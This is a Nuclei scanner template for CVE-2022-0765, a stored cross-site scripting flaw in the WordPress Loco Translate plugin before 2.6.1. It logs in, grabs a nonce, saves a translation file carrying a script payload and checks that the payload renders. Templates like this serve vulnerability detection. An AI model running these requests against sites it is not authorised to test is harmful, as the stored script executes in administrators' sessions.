id: CVE-2022-0765 info: name: WordPress Loco Translate < 2.6.1 - Cross-Site Scripting author: 0x_Akoko severity: medium description: | Loco Translate WordPress plugin before 2.6.1 contains a stored cross-site scripting vulnerability caused by improper removal of inline events from source translation strings, allowing authenticated users to inject arbitrary JavaScript payloads. impact: | Attackers can execute arbitrary JavaScript in the context of the admin panel, potentially leading to session hijacking or defacement. remediation: | Update to version 2.6.1 or later. reference: - https://wpscan.com/vulnerability/58838f51-323d-41e0-8c85-8e113dc2c587 - https://patchstack.com/database/vulnerability/loco-translate/wordpress-loco-translate-plugin-2-6-0-authenticated-stored-cross-site-scripting-xss-vulnerability - https://nvd.nist.gov/vuln/detail/CVE-2022-0765 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2022-0765 cwe-id: CWE-79 epss-score: 0.04013 epss-percentile: 0.89232 cpe: cpe:2.3:a:loco_translate_project:loco_translate:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 4 tags: cve,cve2022,wordpress,wp,wp-plugin,xss,loco-translate,authenticated flow: http(1) && http(2) && http(3) http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Cookie: wordpress_test_cookie=WP%20Cookie%20check log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | GET /wp-admin/admin.php?path=plugins%2Floco-translate%2Flanguages%2Floco-translate.pot&bundle=loco-translate%2Floco.php&domain=loco-translate&page=loco-plugin&action=file-edit HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - status_code == 200 - contains(body, "loco-nonce") condition: and internal: true extractors: - type: regex name: nonce part: body_2 group: 1 regex: - '"save":"([a-f0-9]+)"' internal: true - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXssTest X-Requested-With: XMLHttpRequest ------WebKitFormBoundaryXssTest Content-Disposition: form-data; name="locale" ------WebKitFormBoundaryXssTest Content-Disposition: form-data; name="path" plugins/loco-translate/languages/loco-translate.pot ------WebKitFormBoundaryXssTest Content-Disposition: form-data; name="bundle" plugin.loco-translate/loco.php ------WebKitFormBoundaryXssTest Content-Disposition: form-data; name="domain" loco-translate ------WebKitFormBoundaryXssTest Content-Disposition: form-data; name="po"; filename="undefined" Content-Type: application/x-gettext msgid "" msgstr "" "Project-Id-Version: Loco Translate\n" "MIME-Version: 1.0\n" "Content-Type: text/plain; charset=UTF-8\n" "Content-Transfer-Encoding: 8bit\n" msgid "\">'>
" msgstr "" ------WebKitFormBoundaryXssTest Content-Disposition: form-data; name="action" loco_json ------WebKitFormBoundaryXssTest Content-Disposition: form-data; name="route" save ------WebKitFormBoundaryXssTest Content-Disposition: form-data; name="loco-nonce" {{nonce}} ------WebKitFormBoundaryXssTest-- matchers: - type: dsl dsl: - status_code == 200 - contains(body, "POT file saved") condition: and internal: true - raw: - | GET /wp-admin/admin.php?path=plugins%2Floco-translate%2Flanguages%2Floco-translate.pot&bundle=loco-translate%2Floco.php&domain=loco-translate&page=loco-plugin&action=file-edit HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - status_code == 200 - contains(body, "ontoggle=alert(document.domain)>") condition: and # digest: 490a004630440220097a72197bcda47c7a9bf072adee3e6f2742aef54d48251599d288919c6a69cf02205506f21280ccab11689ea506dce20c673be3beef3416e6b07c088aef034f8eeb:922c64590222798bb761d5b6d8e72950